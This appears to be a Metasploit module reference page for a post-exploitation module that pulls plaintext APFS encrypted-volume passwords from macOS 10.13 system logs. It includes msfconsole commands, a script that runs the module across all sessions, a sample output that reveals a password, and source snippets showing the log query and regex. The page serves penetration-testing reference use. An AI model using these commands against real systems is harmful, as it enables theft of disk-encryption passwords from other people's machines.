Mac OS X APFS Encrypted Volume Password Disclosure - Metasploit
This page contains detailed information about how to use the post/osx/gather/apfs_encrypted_volume_passwd metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Mac OS X APFS Encrypted Volume Password Disclosure
Module: post/osx/gather/apfs_encrypted_volume_passwd
Source code: modules/post/osx/gather/apfs_encrypted_volume_passwd.rb
Disclosure date: 2018-03-21
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploits a flaw in OSX 10.13 through 10.13.3 that discloses the passwords of encrypted APFS volumes. In OSX a normal user can use the 'log' command to view the system logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS volume the password is visible in plaintext within these logs.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/osx/gather/apfs_encrypted_volume_passwd
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/osx/gather/apfs_encrypted_volume_passwd
msf post(apfs_encrypted_volume_passwd) > show options
... show and set options ...
msf post(apfs_encrypted_volume_passwd) > set SESSION session-id
msf post(apfs_encrypted_volume_passwd) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/osx/gather/apfs_encrypted_volume_passwd")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module uses a vulnerability in macOS High Sierra's log
command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.
- macOS 10.13.0
- macOS 10.13.1
- macOS 10.13.2
- macOS 10.13.3*
* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system upgrade to 10.13.3. See here for more info
Verification Steps
- Start
msfconsole
- Do:
use post/osx/gather/apfs_encrypted_volume_passwd
- Do: set the
MOUNT_PATH
option if needed - Do:
run
- You should get the password
Options
MOUNT_PATH
MOUNT_PATH
is the path on the macOS system where the encrypted drive is (or was) mounted. This is not the path under /Volumes
Scenarios
Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
SESSION => -1
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
[*] Post module execution completed
msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
Go back to menu.
Msfconsole Usage
Here is how the osx/gather/apfs_encrypted_volume_passwd post exploitation module looks in the msfconsole:
msf6 > use post/osx/gather/apfs_encrypted_volume_passwd
msf6 post(osx/gather/apfs_encrypted_volume_passwd) > show info
Name: Mac OS X APFS Encrypted Volume Password Disclosure
Module: post/osx/gather/apfs_encrypted_volume_passwd
Platform: OSX
Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Rank: Normal
Disclosed: 2018-03-21
Provided by:
Sarah Edwards
cbrnrd
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MOUNT_PATH no The mount path of the volume to get the password of (Leave blank for all)
SESSION yes The session to run this module on.
Description:
This module exploits a flaw in OSX 10.13 through 10.13.3 that
discloses the passwords of encrypted APFS volumes. In OSX a normal
user can use the 'log' command to view the system logs. In OSX 10.13
to 10.13.2 when a user creates an encrypted APFS volume the password
is visible in plaintext within these logs.
References:
https://thehackernews.com/2018/03/macos-apfs-password.html
https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp
Module Options
This is a complete list of options available in the osx/gather/apfs_encrypted_volume_passwd post exploitation module:
msf6 post(osx/gather/apfs_encrypted_volume_passwd) > show options
Module options (post/osx/gather/apfs_encrypted_volume_passwd):
Name Current Setting Required Description
---- --------------- -------- -----------
MOUNT_PATH no The mount path of the volume to get the password of (Leave blank for all)
SESSION yes The session to run this module on.
Advanced Options
Here is a complete list of advanced options supported by the osx/gather/apfs_encrypted_volume_passwd post exploitation module:
msf6 post(osx/gather/apfs_encrypted_volume_passwd) > show advanced
Module advanced options (post/osx/gather/apfs_encrypted_volume_passwd):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the osx/gather/apfs_encrypted_volume_passwd module can do:
msf6 post(osx/gather/apfs_encrypted_volume_passwd) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the osx/gather/apfs_encrypted_volume_passwd post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(osx/gather/apfs_encrypted_volume_passwd) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
This version of OSX is not vulnerable
Here is a relevant code snippet related to the "This version of OSX is not vulnerable" error message:
42: Exploit::CheckCode::Safe
43: end
44:
45: def run
46: if check == Exploit::CheckCode::Safe
47: print_error "This version of OSX is not vulnerable"
48: return
49: end
50: cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
51: cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
52: vprint_status "Running \"#{cmd}\" on target..."
Got no response from target. Stopping...
Here is a relevant code snippet related to the "Got no response from target. Stopping..." error message:
51: cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
52: vprint_status "Running \"#{cmd}\" on target..."
53: results = cmd_exec(cmd)
54: vprint_status "Target results:\n#{results}"
55: if results.empty?
56: print_error 'Got no response from target. Stopping...'
57: else
58: successful_lines = 0
59: results.lines.each do |l|
60: next unless l =~ /newfs_apfs(.*)-S(.*)$/
61: print_good "APFS command found: #{$&}"
No password(s) found for any volumes. Exiting...
Here is a relevant code snippet related to the "No password(s) found for any volumes. Exiting..." error message:
57: else
58: successful_lines = 0
59: results.lines.each do |l|
60: next unless l =~ /newfs_apfs(.*)-S(.*)$/
61: print_good "APFS command found: #{$&}"
62: successful_lines += 1
63: end
64: print_error "No password(s) found for any volumes. Exiting..." if successful_lines.zero?
65: end
66: end
67: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #12354 Merged Pull Request: Remove targets from aux and post modules
- #9784 Merged Pull Request: Add OSX High Sierra APFS volume password disclosure
References
- CVE: Not available
- https://thehackernews.com/2018/03/macos-apfs-password.html
- https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp
See Also
Check also the following modules related to this module:
- post/osx/gather/autologin_password
- post/osx/gather/enum_adium
- post/osx/gather/enum_airport
- post/osx/gather/enum_chicken_vnc_profile
- post/osx/gather/enum_colloquy
- post/osx/gather/enum_keychain
- post/osx/gather/enum_messages
- post/osx/gather/enum_osx
- post/osx/gather/gitignore
- post/osx/gather/hashdump
- post/osx/gather/password_prompt_spoof
- post/osx/gather/safari_lastsession
- post/osx/gather/vnc_password_osx
Authors
- Sarah Edwards
- cbrnrd
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.